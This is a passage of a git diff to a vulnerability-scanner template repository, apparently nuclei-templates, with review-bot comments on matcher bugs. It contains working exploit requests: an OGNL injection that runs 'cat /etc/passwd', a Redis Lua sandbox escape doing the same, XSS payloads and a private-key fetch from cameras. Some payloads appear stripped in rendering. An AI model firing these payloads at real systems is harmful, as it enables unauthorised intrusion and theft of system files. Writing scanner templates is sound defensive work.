(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + - (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + - 
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + - (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'})) - } - - ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— - - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-32030.yaml b/nuclei-templates/CVE-2021/cve-2021-32030.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-32030.yaml rename to nuclei-templates/CVE-2021/cve-2021-32030.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-32172.yaml b/nuclei-templates/CVE-2021/cve-2021-32172.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-32172.yaml rename to nuclei-templates/CVE-2021/cve-2021-32172.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-32618.yaml b/nuclei-templates/CVE-2021/cve-2021-32618.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-32618.yaml rename to nuclei-templates/CVE-2021/cve-2021-32618.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-3297.yaml b/nuclei-templates/CVE-2021/cve-2021-3297.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-3297.yaml rename to nuclei-templates/CVE-2021/cve-2021-3297.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-33357.yaml b/nuclei-templates/CVE-2021/cve-2021-33357.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-33357.yaml rename to nuclei-templates/CVE-2021/cve-2021-33357.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-33564.yaml b/nuclei-templates/CVE-2021/cve-2021-33564.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-33564.yaml rename to nuclei-templates/CVE-2021/cve-2021-33564.yaml 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-3377.yaml b/nuclei-templates/CVE-2021/cve-2021-3377.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-3377.yaml
rename to nuclei-templates/CVE-2021/cve-2021-3377.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-34640.yaml b/nuclei-templates/CVE-2021/cve-2021-34640.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-34640.yaml
rename to nuclei-templates/CVE-2021/cve-2021-34640.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-34643.yaml b/nuclei-templates/CVE-2021/cve-2021-34643.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-34643.yaml
rename to nuclei-templates/CVE-2021/cve-2021-34643.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-34805.yaml b/nuclei-templates/CVE-2021/cve-2021-34805.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-34805.yaml
rename to nuclei-templates/CVE-2021/cve-2021-34805.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-3577.yaml b/nuclei-templates/CVE-2021/cve-2021-3577.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-3577.yaml
rename to nuclei-templates/CVE-2021/cve-2021-3577.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-36450.yaml b/nuclei-templates/CVE-2021/cve-2021-36450.yaml
new file mode 100644
index 0000000000..5b869877e6
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-36450.yaml
@@ -0,0 +1,65 @@
+id: CVE-2021-36450
+
+info:
+ name: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting
+ author: atomiczsec
+ severity: medium
+ description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.
+ reference:
+ - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
+ - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
+ - http://verint.com
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-36450
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-36450
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: title:"Verint Sign-in"
+ verified: "true"
+ tags: cve,cve2021,xss,verint
+
+requests:
+ - raw:
+ - |
+ GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}
+
+ host-redirects: true
+ max-redirects: 2
+ cookie-reuse: true
+
+ extractors:
+ - type: regex
+ part: header
+ internal: true
+ name: csrfp_login
+ group: 1
+ regex:
+ - 'csrfp_login=([a-zA-Z0-9]+);'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '">

Test

26" class="loginUserNameText'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/nuclei-templates/CVE-2021/CVE-2021-36749.yaml b/nuclei-templates/CVE-2021/cve-2021-36749.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-36749.yaml
rename to nuclei-templates/CVE-2021/cve-2021-36749.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-37216.yaml b/nuclei-templates/CVE-2021/cve-2021-37216.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-37216.yaml
rename to nuclei-templates/CVE-2021/cve-2021-37216.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-37580.yaml b/nuclei-templates/CVE-2021/cve-2021-37580.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-37580.yaml
rename to nuclei-templates/CVE-2021/cve-2021-37580.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-38647.yaml b/nuclei-templates/CVE-2021/cve-2021-38647.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-38647.yaml
rename to nuclei-templates/CVE-2021/cve-2021-38647.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-38702.yaml b/nuclei-templates/CVE-2021/cve-2021-38702.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-38702.yaml
rename to nuclei-templates/CVE-2021/cve-2021-38702.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-39211.yaml b/nuclei-templates/CVE-2021/cve-2021-39211.yaml
deleted file mode 100644
index 3cfca7f214..0000000000
--- a/nuclei-templates/CVE-2021/cve-2021-39211.yaml
+++ /dev/null
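Review bot: The two `rd=` values carry different payloads: the GET encodes `%3Ch1%3ETest%3C%2Fh1%3E` (a closed `h1`) while the POST encodes `%3Ch1%3ETest%3Ch1%3E%26`, a second opening tag in place of the closing one, and the single body matcher can only correspond to one of them; make both request lines carry the value the matcher expects. The word matcher itself is split across rendered lines here (`'">` … `Test` … `26" class="loginUserNameText'`), which looks like tag markup dropped by the page renderer, so verify the committed file holds the literal string. The POST also hard-codes `username=admin`; the other multi-step templates in this commit (CVE-2022-0599, CVE-2022-0660) take `{{username}}`, and if the value only has to be reflected into `loginUserNameText` a neutral marker such as `{{randstr}}` avoids recording a failed admin login on every scanned host.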
@@ -1,35 +0,0 @@
-id: CVE-2021-39211
-
-info:
- name: GLPI Telemetry Disclosure
- author: dogasantos,noraj
- severity: medium
- description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-39211
- - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825
- - https://github.com/glpi-project/glpi/releases/tag/9.5.6
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.3
- cve-id: CVE-2021-39211
- cwe-id: CWE-668,CWE-200
- tags: cve,cve2021,glpi,exposure
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/ajax/telemetry.php"
- - "{{BaseURL}}/glpi/ajax/telemetry.php"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"uuid":'
- - '"glpi":'
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2021/CVE-2021-39433.yaml b/nuclei-templates/CVE-2021/cve-2021-39433.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-39433.yaml
rename to nuclei-templates/CVE-2021/cve-2021-39433.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-40149.yaml b/nuclei-templates/CVE-2021/cve-2021-40149.yaml
new file mode 100644
index 0000000000..9d9700aaaf
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-40149.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-40149
+
+info:
+ name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
+ author: For3stCo1d
+ severity: medium
+ description: |
+ Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
+ reference:
+ - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
+ - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 5.9
+ cve-id: CVE-2021-40149
+ cwe-id: CWE-552
+ metadata:
+ shodan-query: http.title:"Reolink"
+ verified: "true"
+ tags: cve,cve2021,reolink,camera,iot,exposure,unauth
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/self.key"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "-----BEGIN RSA PRIVATE KEY-----"
+ - "-----END RSA PRIVATE KEY----"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/30
diff --git a/nuclei-templates/CVE-2021/CVE-2021-40323.yaml b/nuclei-templates/CVE-2021/cve-2021-40323.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-40323.yaml
rename to nuclei-templates/CVE-2021/cve-2021-40323.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-40868.yaml b/nuclei-templates/CVE-2021/cve-2021-40868.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-40868.yaml
rename to nuclei-templates/CVE-2021/cve-2021-40868.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41266.yaml b/nuclei-templates/CVE-2021/cve-2021-41266.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-41266.yaml
rename to nuclei-templates/CVE-2021/cve-2021-41266.yaml
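Review bot: The second word is `"-----END RSA PRIVATE KEY----"` with four trailing dashes while the BEGIN marker has five; as a substring it still matches the real footer, but it reads as a typo and should be `"-----END RSA PRIVATE KEY-----"` so the two markers are symmetric. The word matcher has no `part:`; adding `part: body` makes the scope explicit, as the other templates in this commit do.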
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41282.yaml b/nuclei-templates/CVE-2021/cve-2021-41282.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-41282.yaml
rename to nuclei-templates/CVE-2021/cve-2021-41282.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41291.yaml b/nuclei-templates/CVE-2021/cve-2021-41291.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-41291.yaml
rename to nuclei-templates/CVE-2021/cve-2021-41291.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41381.yaml b/nuclei-templates/CVE-2021/cve-2021-41381.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-41381.yaml
rename to nuclei-templates/CVE-2021/cve-2021-41381.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41648.yaml b/nuclei-templates/CVE-2021/cve-2021-41648.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-41648.yaml
rename to nuclei-templates/CVE-2021/cve-2021-41648.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41826.yaml b/nuclei-templates/CVE-2021/cve-2021-41826.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-41826.yaml
rename to nuclei-templates/CVE-2021/cve-2021-41826.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41878.yaml b/nuclei-templates/CVE-2021/cve-2021-41878.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-41878.yaml
rename to nuclei-templates/CVE-2021/cve-2021-41878.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-42551.yaml b/nuclei-templates/CVE-2021/cve-2021-42551.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-42551.yaml
rename to nuclei-templates/CVE-2021/cve-2021-42551.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-43778.yaml b/nuclei-templates/CVE-2021/cve-2021-43778.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-43778.yaml
rename to nuclei-templates/CVE-2021/cve-2021-43778.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-43810.yaml b/nuclei-templates/CVE-2021/cve-2021-43810.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-43810.yaml
rename to nuclei-templates/CVE-2021/cve-2021-43810.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-44077.yaml b/nuclei-templates/CVE-2021/cve-2021-44077.yaml
new file mode 100644
index 0000000000..e5f78a77ee
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-44077.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-44077
+
+info:
+ name: Zoho ManageEngine ServiceDesk Plus - Remote Code Execution
+ author: Adam Crosser,gy741
+ severity: critical
+ description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.
+ reference:
+ - https://www.cisa.gov/uscert/ncas/alerts/aa21-336a
+ - https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/
+ - https://github.com/horizon3ai/CVE-2021-44077
+ - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44077
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-44077
+ cwe-id: CWE-287
+ tags: rce,kev,msf,cve,cve2021,zoho,manageengine
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/RestAPI/ImportTechnicians"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ - 'pm_query'
+ condition: and
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0288.yaml b/nuclei-templates/CVE-2022/CVE-2022-0288.yaml
new file mode 100644
index 0000000000..7023ac1948
--- /dev/null
+++ b/nuclei-templates/CVE-2022/CVE-2022-0288.yaml
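Review bot: The first entry of the body word matcher is the empty string `''`, which every response contains, so with `condition: and` the check reduces to `pm_query` plus a `text/html` header; the page renders the entry empty, which suggests an HTML marker was stripped in rendering, so confirm the committed file carries a non-empty string and otherwise drop the entry. There is also no status matcher, unlike the other new templates in this commit (CVE-2021-40149, CVE-2022-0288), so an error page that happens to echo `pm_query` would match; add `- type: status` / `status:` / `- 200` under `matchers`.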
@@ -0,0 +1,38 @@
+id: CVE-2022-0288
+info:
+ name: Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting
+ author: DhiyaneshDK
+ severity: medium
+ description: The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
+ remediation: Fixed in version 2.7.12
+ reference:
+ - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2022-0288
+ cwe-id: CWE-79
+ tags: cve,cve2022,wordpress,xss
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}"
+ headers:
+ Content-Type: "application/x-www-form-urlencoded"
+ body: |
+ html_element_selection=
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - ""
+ - "ad-inserter"
+ condition: and
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/nuclei-templates/CVE-2022/cve-2022-0378.yaml b/nuclei-templates/CVE-2022/CVE-2022-0378.yaml
similarity index 100%
rename from nuclei-templates/CVE-2022/cve-2022-0378.yaml
rename to nuclei-templates/CVE-2022/CVE-2022-0378.yaml
diff --git a/nuclei-templates/CVE-2022/cve-2022-0482.yaml b/nuclei-templates/CVE-2022/CVE-2022-0482.yaml
similarity index 100%
rename from nuclei-templates/CVE-2022/cve-2022-0482.yaml
rename to nuclei-templates/CVE-2022/CVE-2022-0482.yaml
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0543.yaml b/nuclei-templates/CVE-2022/CVE-2022-0543.yaml
deleted file mode 100644
index 00d78f467c..0000000000
--- a/nuclei-templates/CVE-2022/CVE-2022-0543.yaml
+++ /dev/null
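Review bot: The request `body` is `html_element_selection=` with no value and the first matcher word is `""`, so as shown the template sends no reflected marker and the empty word matches any body, meaning the result fires on every page that contains `ad-inserter`; both look like markup lost in rendering, so confirm the committed file carries the marker and the matching reflected string. `cvss-score: 6.10` should be written `6.1`, the form used for the same vector in CVE-2021-36450 and CVE-2022-0599. The `name` says `< 2.7.10` while `remediation:` says `Fixed in version 2.7.12`; check the wpscan entry and make the two agree.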
@@ -1,35 +0,0 @@ -id: CVE-2022-0543 -info: - name: Redis Sandbox Escape - Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The - vulnerability was introduced by Debian and Ubuntu Redis packages that - insufficiently sanitized the Lua environment. The maintainers failed to - disable the package interface, allowing attackers to load arbitrary libraries. - reference: - - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis - - https://bugs.debian.org/1005787 - - https://www.debian.org/security/2022/dsa-5081 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2022-0543 - metadata: - shodan-query: redis_version - tags: cve,cve2022,network,redis,unauth,rce,kev -network: - - inputs: - - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" - host: - - "{{Hostname}}" - - "{{Host}}:6379" - read-size: 64 - matchers: - - type: regex - regex: - - "root:.*:0:0:" - -# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0595.yaml b/nuclei-templates/CVE-2022/CVE-2022-0595.yaml deleted file mode 100644 index c7eba1bbd5..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0595.yaml +++ /dev/null 
@@ -1,50 +0,0 @@ -id: CVE-2022-0595 -info: - name: Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS - author: akincibor - severity: medium - description: The plugin allows SVG files to be uploaded by default via the dnd_codedropz_upload AJAX action, which could lead to Stored Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/1b849957-eaca-47ea-8f84-23a3a98cc8de - - https://plugins.trac.wordpress.org/changeset/2686614 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-0595 - cwe-id: CWE-79 - tags: cve,cve2022,xss,wordpress,wp-plugin -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161 - - -----------------------------92633278134516118923780781161 - Content-Disposition: form-data; name="size_limit" - - 10485760 - -----------------------------92633278134516118923780781161 - Content-Disposition: form-data; name="action" - - dnd_codedropz_upload - -----------------------------92633278134516118923780781161 - Content-Disposition: form-data; name="type" - - click - -----------------------------92633278134516118923780781161 - Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.svg" - Content-Type: image/jpeg - - - -----------------------------92633278134516118923780781161-- - - | - GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "alert(document.domain)")' - - 'status_code_2 == 200' - condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-0599.yaml b/nuclei-templates/CVE-2022/CVE-2022-0599.yaml new file mode 100644 index 0000000000..9c91f354e8 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0599.yaml 
@@ -0,0 +1,41 @@
+id: CVE-2022-0599
+info:
+ name: The Mapping Multiple URLs Redirect Same Page WordPress plugin through 5.8 - Reflected XSS
+ author: scent2d
+ severity: medium
+ description: |
+ The Mapping Multiple URLs Redirect Same Page WordPress plugin through 5.8 does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.
+ reference:
+ - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765
+ - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/
+ - https://nvd.nist.gov/vuln/detail/cve-2022-0599
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-0599
+ cwe-id: CWE-79
+ tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="> HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'id="mmursp_id" value="\">" />'
+ - type: dsl
+ dsl:
+ - 'status_code_2 == 200'
+ - 'contains(all_headers_2, "text/html")'
+ condition: and
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0653.yaml b/nuclei-templates/CVE-2022/CVE-2022-0653.yaml
new file mode 100644
index 0000000000..e06a6c604a
--- /dev/null
+++ b/nuclei-templates/CVE-2022/CVE-2022-0653.yaml
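Review bot: The second raw request puts `"` and `>` unencoded into the request-target (`mmursp_id="> HTTP/1.1`); a raw double quote in the request line is rejected by some servers and proxies before WordPress sees it, so percent-encode the value (`mmursp_id=%22%3E…`) as CVE-2021-36450 does for its `rd=` payload — the page also appears to have dropped markup after `">`, so check the committed line. The word matcher names no response while the dsl matcher pins `status_code_2` and `all_headers_2`; expressing the body check as a `contains(body_2, …)` dsl entry, as CVE-2022-0660 and CVE-2022-0954 do, keeps it on the same response as the status check.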
@@ -0,0 +1,37 @@
+id: CVE-2022-0653
+
+info:
+ name: Wordpress Profile Builder Plugin Cross-Site Scripting
+ author: dhiyaneshDk
+ severity: medium
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653
+ - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
+ tags: cve,cve2022,wordpress,xss,wp-plugin
+ description: "The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n."
+ remediation: Upgrade to version 3.6.5 or later.
+ classification:
+ cve-id: CVE-2022-0653
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'here'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/28
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0660.yaml b/nuclei-templates/CVE-2022/CVE-2022-0660.yaml
new file mode 100644
index 0000000000..04b0da86ab
--- /dev/null
+++ b/nuclei-templates/CVE-2022/CVE-2022-0660.yaml
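Review bot: The first reference `https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653` lacks the `CVE-` prefix in `name=`, so it does not resolve to the record; use `name=CVE-2022-0653`. The `description` string ends in a stray `\n\n.`, and `classification` carries only `cve-id` while the sibling templates also set `cvss-metrics`, `cvss-score` and `cwe-id: CWE-79`. The body matcher is the bare word `'here'`, which a fixed plugin's fallback page would presumably contain as well, so together with `text/html` and 200 it cannot tell patched from vulnerable; if anchor markup was dropped in rendering, confirm the committed file matches the full reflected `site_url` value.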
@@ -0,0 +1,45 @@
+id: CVE-2022-0660
+info:
+ name: Microweber < 1.2.11 - Information Disclosure
+ author: amit-jd
+ severity: high
+ description: |
+ Generation of error message containing sensitive information while viewing comments from "load_module:comments#search="in Packagist microweber/microweber prior to 1.2.11.
+ reference:
+ - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/
+ - https://github.com/advisories/GHSA-hhrj-wp42-32v3
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0660
+ - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: CWE-209
+ metadata:
+ verified: "true"
+ tags: cve,cve2022,microweber,disclosure,authenticated
+requests:
+ - raw:
+ - |
+ POST /api/user_login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}&password={{password}}
+ - |
+ POST /module/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Referer: {{BaseURL}}admin/view:comments
+
+ class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}
+ req-condition: true
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ dsl:
+ - contains(body_2,'QueryException')
+ - contains(body_2,'SQLSTATE')
+ - contains(body_2,'runQueryCallback')
+ - 'contains(all_headers_2,"text/html")'
+ - 'status_code_2==500'
+ condition: and
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0776.yaml b/nuclei-templates/CVE-2022/CVE-2022-0776.yaml
new file mode 100644
index 0000000000..153fbe5e2b
--- /dev/null
+++ b/nuclei-templates/CVE-2022/CVE-2022-0776.yaml
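Review bot: `Referer: {{BaseURL}}admin/view:comments` has no `/` between the base URL and the path, unlike `{{BaseURL}}/admin/view:shop/action:options` in CVE-2022-0954; if `{{BaseURL}}` carries no trailing slash the header becomes `https://hostadmin/…`, so write `Referer: {{BaseURL}}/admin/view:comments`. `classification` sets `cwe-id` but no `cve-id: CVE-2022-0660`, which every other template in this commit includes. The `reference` list also lists the same huntr bounty twice (with and without the trailing slash); keep one.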
